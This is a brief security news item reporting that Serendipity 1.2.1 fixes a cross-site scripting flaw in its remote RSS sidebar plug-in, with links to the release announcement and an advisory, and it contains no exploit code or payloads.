XSS vulnerability in Serendipity blog system remedied
External RSS feeds may allow users or readers of systems based on Serendipity to inject arbitrary HTML and script code and execute it within the browser in the context of the blog system. The vulnerability may even expose login data. The problem is the result of a lack of content filtering in external feeds by the remote RSS sidebar plug-in.
The flaw has been remedied in version 1.2.1 of Serendipity. In addition, the new version provides a number of improvements and fixes for minor flaws. For instance, a new WordPress database importer reportedly facilitates the switch from WordPress to Serendipity.
- Serendipity 1.2.1 released, Serendipity announcement
- Cross site scripting (XSS) in rss feed plugin of Serendipity 1.2 , Security advisory by Hanno Böck